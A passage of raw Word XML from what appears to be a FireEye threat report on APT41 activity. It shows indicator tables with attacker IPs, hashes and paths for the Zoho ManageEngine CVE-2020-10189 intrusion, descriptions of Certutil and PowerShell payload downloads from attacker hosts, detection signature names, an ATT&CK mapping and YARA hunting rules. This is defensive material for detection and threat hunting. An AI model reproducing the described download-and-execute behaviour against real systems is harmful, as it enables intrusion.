      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="50658F2D"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FA3BD9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Cisco Router Exploitation</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AC3D8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66.42.98\.220</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C0C2A0"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‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF74D8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‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="7796C7F4"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332A37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CVE-2020-10189 (Zoho ManageEngine Desktop Central)</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B5D83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66.42.98[.]220</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63344A2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91.208.184[.]78</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="680CF53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74.82.201[.]8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5428D470"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exchange.dumb1[.]com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6ABE21"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install.bat (MD5: 7966c2c546b71e800397a67f942858d0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430CD1F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storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE0436D"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C:\Windows\Temp\storesyncsvc.dll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F87A41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C:\Windows\Temp\install.bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AF952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2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F997A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C:\Users\[redacted]\install.bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3C2BD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TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686A1A09"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C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4975CA0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lastRenderedPageBreak/>
              <w:t>Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D5151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PowerShell downloading files with Net.WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E81C91C" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detecting the Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D1F8D"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t>FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4668"/>
        <w:gridCol w:w="4676"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="374D19E3"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8018C0"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Platform</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423DE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Signature Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="79491088"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3E6ED0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Endpoint Security</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1F53DE"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E16C4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BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14049B2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CERTUTIL.EXE DOWNLOADER A (UTILITY)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC18841"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Generic.mg.5909983db4d9023e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E94F1F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Generic.mg.3e856162c36b5329</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03136E1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POWERSHELL DOWNLOADER (METHODOLOGY)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B734EA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SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319C745F"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SAMWELL (BACKDOOR)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2930F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SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="0C68B521"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0C1B3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Network Security</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7C8604"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Backdoor.Meterpreter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2DFF0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DTI.Callback</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="459E7E0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Exploit.CitrixNetScaler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C55522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Trojan.METASTAGE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203E18F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Exploit.ZohoManageEngine.CVE-2020-10198.Pwner</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09513B9D"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Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="32D47297"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F9643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Helix</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8678C9"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CITRIX ADC [Suspicious Commands]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> EXPLOIT - CITRIX ADC [CVE-2019-19781 </w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit Attempt]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> MALWARE METHODOLOGY [Certutil User-Agent]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> WINDOWS METHODOLOGY [BITSadmin Transfer]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t> WINDOWS METHODOLOGY [Certutil Downloader]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B3CCDD8" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK Technique Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4672"/>
        <w:gridCol w:w="4672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="59D3353B"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6B199C9"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ATT&amp;CK</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6655DF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Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="53570E85"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AE0A7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Initial Access</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D4AF5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External Remote Services (T1133), Exploit Public-Facing Application (T1190)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="64EB1296"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D4D87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Execution</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9810007"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PowerShell (T1086), Scripting (T1064)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="7E087EB0"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935030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Persistence</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1C2B52E"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New Service (T1050)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55AD8D09"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="62914CD9"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6F11FC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Privilege Escalation</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5CAFE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Exploitation for Privilege Escalation (T1068)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD4AA2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="084E0578"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3E0C3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Defense Evasion</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670BE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BITS Jobs (T1197), Process Injection (T1055)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A402457"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BED06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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="14B4E186" w14:textId="77777777" w:rsidTr="00356DA3">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347E59"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Command And Control</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DFE72F"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Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A3C9749" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Appendix A: Discovery Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184C1E9" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="0B3C80AF" w14:textId="77777777" w:rsidTr="00356DA3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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D0FBAD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import "pe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7EE674"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rule ExportEngine_APT41_Loader_String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025BBF1E"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14BFA69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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176777CF"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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776BEF1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description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C0AD6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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C95D74"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$pcre = /loader_[\x00-\x7F]{1,}\x00/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C12E97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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C94095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uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06366F60"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715B6E9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rule ExportEngine_ShortName</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BAEAA50"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56C8AAE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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B50888D"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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B936B0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description = "This looks for Win PEs where Export DLL name is a single character"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="317CE0D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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECADCB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$pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67824A4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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C691C1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uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3766F64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lastRenderedPageBreak/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04028817"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rule ExportEngine_xArch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702B97B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536864F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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F6C3D4"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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C3834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description = "This looks for Win PEs where Export DLL name is a something like x32.dat"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8FAD1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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08EFCF41"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$pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72EEB52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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA93A8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uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5937AD27"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47FA960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rule RareEquities_LibTomCrypt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735A2A6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6518F95F"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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A23907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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1169449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description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E78891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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4130922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$a1 = "LibTomMath"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F637E4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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26EFD4F7"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uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C9CEB0"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2E0B104D"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rule RareEquities_KCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797D360E"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538FC05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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD333E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lastRenderedPageBreak/>
              <w:t>        author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D7B24BF"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description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583D8894"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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAD83C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$a01 = "[RO] %ld bytes"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA49C31"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$a02 = "recv sn=%lu"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7808E129"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$a03 = "[RI] %d bytes"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B2C82D"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$a04 = "input ack: sn=%lu rtt=%ld rto=%ld"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70B6179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$a05 = "input psh: sn=%lu ts=%lu"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B3493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$a06 = "input probe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D0C31D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$a07 = "input wins: %lu"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E02EA4"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$a08 = "rcv_nxt=%lu\\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6A0BE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$a09 = "snd(buf=%d, queue=%d)\\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1556FA27"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$a10 = "rcv(buf=%d, queue=%d)\\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C7793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$a11 = "rcvbuf"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3382250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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D31C31"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(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize &lt; 5MB and 3 of ($a*)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17ED427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041ABD3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rule ConventionEngine_Term_Users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D9005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6FEE763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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A395AA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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755736C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description = "Searching for PE files with PDB path keywords, terms or anomalies."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DDDF53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sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="371444E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lastRenderedPageBreak/>
              <w:t>                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4EFB2"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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158C50F7"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$pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430ACA47"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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFEE8A0"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(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412F0C01"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44EC5FF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rule ConventionEngine_Term_Desktop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B29C219"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4C08043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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9752C0"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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4E919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description = "Searching for PE files with PDB path keywords, terms or anomalies."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4334927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sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E3D10C"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ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D78FD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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B58305"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$pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7029D6"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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1001DA7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(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322724BB"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22B8EC6F"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rule ConventionEngine_Anomaly_MultiPDB_Double</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B531147"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p w14:paraId="2CCA980D"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meta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7337FA98"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author = "@stvemillertime"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45958B2F"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description = "Searching for PE files with PDB path keywords, terms or anomalies."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15096E8E"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lastRenderedPageBreak/>
              <w:t>                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E30751"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ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119C7E14"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strings:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9D7BF7"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$pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A97D23"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condition:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3832695A"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                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01008009" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
            <w:pPr>
              <w:spacing w:after="225"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06356648" w14:textId="77777777" w:rsidR="00214751" w:rsidRDefault="00356DA3"/>
    <w:sectPr w:rsidR="0021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A53F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98B8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A3"/>
    <w:rsid w:val="00165D3B"/>
    <w:rsid w:val="00356DA3"/>
    <w:rsid w:val="007E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E12DE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F60DD2E-4E82-8749-BAD3-FB364A56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6D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356DA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DA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56DA3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sep">
    <w:name w:val="sep"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00356DA3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="by-author">
    <w:name w:val="by-author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00356DA3"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00356DA3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tagbutton">
